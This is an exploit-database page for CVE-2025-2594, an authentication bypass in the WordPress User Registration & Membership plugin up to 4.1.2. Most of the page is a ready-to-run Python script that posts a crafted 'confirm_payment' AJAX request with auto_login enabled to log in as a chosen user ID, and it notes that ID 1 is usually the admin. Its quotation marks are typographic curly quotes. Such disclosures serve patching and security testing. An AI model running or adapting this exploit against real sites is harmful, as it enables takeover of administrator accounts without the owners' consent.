WordPress User Registration & Membership Plugin 4.1.2

Exploit Details

Basic Information

Exploit Title	WordPress User Registration & Membership Plugin 4.1.2 – Authentication Bypass
Exploit ID	EDB-ID:52302
Type	exploitdb
Published	2025-05-25T00:00:00
Modified	2025-05-25T00:00:00

CVSS Information

CVSS Score	8.1
Severity	HIGH
Vector	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE Information

CVE-2025-2594

Exploit Description

!/usr/bin/env python3 Exploit Title: WordPress User Registration & Membership Plugin 4.1.2 – Authentication Bypass…

Exploit Code

#!/usr/bin/env python3

# Exploit Title: WordPress User Registration & Membership Plugin 4.1.2 – Authentication Bypass

# Date: 2025-05-22

# Exploit Author: Mohammed Idrees Banyamer

# Vendor Homepage: https://wordpress.org/plugins/user-registration/

# Software Link: https://downloads.wordpress.org/plugin/user-registration.4.1.2.zip

# Version: <= 4.1.2

# Tested on: WordPress 6.x, Apache on Linux

# CVE: CVE-2025-2594
import requests

import sys

import argparse

from urllib.parse import urljoin

from termcolor import cprint, colored
def banner():

    cprint(“┌──────────────────────────────────────────────┐”, “cyan”)

    cprint(“│ WordPress Plugin User Registration <= 4.1.2   │", "cyan")

    cprint(“│ Authentication Bypass Exploit (CVE-2025-2594)│”, “cyan”)

    cprint(“│ Author: Mohammed Idrees Banyamer             │”, “cyan”)

    cprint(“└──────────────────────────────────────────────┘”, “cyan”)
def exploit(target_url, member_id, nonce):

    endpoint = urljoin(target_url, “/wp-admin/admin-ajax.php”)
    files = {

        ‘action’: (None, ‘user_registration_membership_confirm_payment’),

        ‘security’: (None, nonce),

        ‘form_response’: (None, ‘{“auto_login”: true}’),

        ‘member_id’: (None, str(member_id))

    }
    cprint(f”[+] Target URL: {endpoint}”, “yellow”)

    cprint(f”[+] Attempting to bypass authentication as user ID {member_id}…\n”, “yellow”)
    try:

        response = requests.post(endpoint, files=files, timeout=10)
        if response.status_code == 200 and ‘”success”:true’ in response.text:

            cprint(“[✓] Exploit successful! Authentication bypass achieved.”, “green”)

            cprint(“[!] Check your session/cookies – you may now be authenticated as the target user.\n”, “green”)

            print(“Server Response:”)

            print(response.text)

        else:

            cprint(“[-] Exploit failed or invalid nonce/member_id.”, “red”)

            print(“Server Response:”)

            print(response.text)

    except requests.exceptions.RequestException as e:

        cprint(f”[!] Request failed: {e}”, “red”)
def main():

    banner()
    parser = argparse.ArgumentParser(description=”CVE-2025-2594 – WordPress Plugin Authentication Bypass”)

    parser.add_argument(“target”, help=”Base target URL (e.g., http://localhost)”)

    parser.add_argument(“member_id”, help=”Target user ID (usually 1 for admin)”)

    parser.add_argument(“nonce”, help=”_confirm_payment_nonce value from registration page”)
    args = parser.parse_args()
    exploit(args.target, args.member_id, args.nonce)
if __name__ == “__main__”:

    main()

View Full Exploit Details

Exploit Details

Basic Information

CVSS Information

CVE Information

Exploit Description

Exploit Code

💭 Join the Security Discussion ❌ Cancel Reply